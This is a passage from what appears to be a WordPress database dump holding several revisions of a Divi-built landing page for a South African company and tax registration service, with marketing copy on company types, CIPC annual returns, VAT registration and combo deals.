inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Combo Deals<br /></span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_4,1_4\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/tax-registration/\" use_icon=\"on\" font_icon=\"%%155%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Tax Registration\" _builder_version=\"3.0.87\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/product-category/tax-registration/\">Tax Registration</a></h4>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"combo deals\" _builder_version=\"3.2.1\" custom_padding=\"25px||80px|\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1200ms\" animation_delay=\"450ms\" inline_fonts=\"Abel\"]<h2 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; color: #c10097;\"><strong><a href=\"https://companyregistration.online/combo-services/\">Save by getting a combo of services here</a><br />\r\n</strong></span><a href=\"https://companyregistration.online/combo-services/\" rel=\"https://companyregistration.online/pricing-table/\"><img class=\"alignright wp-image-28359\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600-300x300.png\" alt=\"\" width=\"103\" height=\"103\" /></a></h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/combo-services/\" use_icon=\"on\" font_icon=\"%%151%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Combo Savings\" _builder_version=\"3.0.89\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"750ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/combo-services/\">Combo Savings</a></h4>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-15 12:49:50','2019-08-15 10:49:50','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(32794,3,'2019-08-15 12:54:47','2019-08-15 10:54:47','[et_pb_section fb_built=\"1\" inner_shadow=\"on\" _builder_version=\"3.26.3\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" background_size=\"contain\" background_repeat=\"repeat-y\" custom_padding=\"3px|0px|0px|0px\" top_divider_style=\"wave2\" top_divider_color=\"rgba(0,0,0,0)\" top_divider_height=\"46px\" top_divider_flip=\"horizontal\" animation_style=\"zoom\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Flags\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"10px|0px|0px|0px\" make_fullwidth=\"on\" locked=\"off\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align=\"right\" align_tablet=\"center\" align_last_edited=\"on|desktop\" disabled_on=\"on|on|off\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.24\" background_color=\"#ffffff\" parallax=\"on\" custom_padding=\"20px|0px|1px|0px|false|false\"][et_pb_row module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|0px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.24\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" body_font=\"||||\" tab_font=\"Abel||||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.26.6\"][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\"][et_pb_divider show_divider=\"off\" _builder_version=\"3.26.6\" height=\"125px\"][/et_pb_divider][et_pb_text _builder_version=\"3.26.6\" text_font=\"|700|||||||\" header_font=\"|700|||||||\" header_text_align=\"center\" header_font_size=\"47px\"]<h1 style=\"text-align: center;\">What Would You Like To Do First ?</h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/working-free-img.jpg\" _builder_version=\"3.26.6\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" _builder_version=\"3.26.6\" width=\"98%\" max_width=\"1347px\" module_alignment=\"center\" custom_margin=\"|223px||427px||\"][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Register A Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/company-registrations/\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>From (PTY) LTD to<br />Closed Corporations <br />We Do It All</strong></p>[/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><strong>What type of companies that can be registered</strong><span> </span>in terms of the New Companies Act 71, 2008</p>\n<ul>\n<li>Private company (Pty) Ltd</li>\n<li>Public company (Ltd)</li>\n<li>State-owned company (SOC)</li>\n<li>External company</li>\n<li>Personal liability company (Inc)</li>\n<li>Non-profit company (NPC)</li>\n</ul>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Maintain My Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong><span>All companies are required by law to file annual returns with the CIPC on an annual basis</span>s</strong></p>[/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><span>All companies (including external companies) and close corporations are required by law to file their annual returns with the CIPC on an annual basis, within a prescribed time period. The purpose for the filing of such annual returns is to confirm whether a company or close corporation is still in business/trading, or if it will be in business in the near future.</span></p>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Register For Tax\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/tax-registrations\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p class=\"\"><strong>Business Professionals  such as </strong><b>Accountants, Lawyers and Doctors practicing.</b></p>[/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p>Any person that carries on a business may register for VAT. The term person is not only limited to companies but also includes, amongst others, individuals, partnerships, trust funds, foreign donor funded projects and municipalities.</p>\n<p>It is<span> </span><span>mandatory</span><span> </span>for a person to register for VAT if sales made from selling goods or services is in excess of R1 million in any consecutive twelve month period.</p>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Combo Deals\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/maintaining-your-company\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><b>Each Company Is Unique In Its Own Right</b></p>\n<p><b></b></p>\n<p>Customize your package and save <span style=\"color: #ff00ff;\">BIG</span></p>[/et_pb_toggle][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\"][et_pb_row column_structure=\"2_3,1_3\" _builder_version=\"3.26.6\" width=\"89%\" max_width=\"1490px\" module_alignment=\"center\" custom_margin=\"|217px||221px||\"][et_pb_column type=\"2_3\" _builder_version=\"3.26.6\"][et_pb_shop type=\"product_category\" posts_number=\"6\" include_categories=\"8,7,17\" columns_number=\"3\" _builder_version=\"3.26.6\"][/et_pb_shop][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-developer-illustration-small-03-1.png\" _builder_version=\"3.26.6\" width=\"100%\" max_width=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.12)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"75%\" custom_padding=\"7px|0px|6px|0px\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"28px|0px|4px|0px\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.89\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Other Registration Categories</span></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|on|off\" _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Combo Deals<br /></span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_4,1_4\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/tax-registration/\" use_icon=\"on\" font_icon=\"%%155%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Tax Registration\" _builder_version=\"3.0.87\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/product-category/tax-registration/\">Tax Registration</a></h4>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"combo deals\" _builder_version=\"3.2.1\" custom_padding=\"25px||80px|\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1200ms\" animation_delay=\"450ms\" inline_fonts=\"Abel\"]<h2 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; color: #c10097;\"><strong><a href=\"https://companyregistration.online/combo-services/\">Save by getting a combo of services here</a><br />\r\n</strong></span><a href=\"https://companyregistration.online/combo-services/\" rel=\"https://companyregistration.online/pricing-table/\"><img class=\"alignright wp-image-28359\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600-300x300.png\" alt=\"\" width=\"103\" height=\"103\" /></a></h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/combo-services/\" use_icon=\"on\" font_icon=\"%%151%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Combo Savings\" _builder_version=\"3.0.89\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"750ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/combo-services/\">Combo Savings</a></h4>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-15 12:54:47','2019-08-15 10:54:47','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(32796,3,'2019-08-15 12:58:27','2019-08-15 10:58:27','[et_pb_section fb_built=\"1\" inner_shadow=\"on\" _builder_version=\"3.26.3\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" background_size=\"contain\" background_repeat=\"repeat-y\" custom_padding=\"3px|0px|0px|0px\" top_divider_style=\"wave2\" top_divider_color=\"rgba(0,0,0,0)\" top_divider_height=\"46px\" top_divider_flip=\"horizontal\" animation_style=\"zoom\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Flags\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"10px|0px|0px|0px\" make_fullwidth=\"on\" locked=\"off\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align=\"right\" align_tablet=\"center\" align_last_edited=\"on|desktop\" disabled_on=\"on|on|off\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.24\" background_color=\"#ffffff\" parallax=\"on\" custom_padding=\"20px|0px|1px|0px|false|false\"][et_pb_row module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|0px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.24\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" body_font=\"||||\" tab_font=\"Abel||||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, 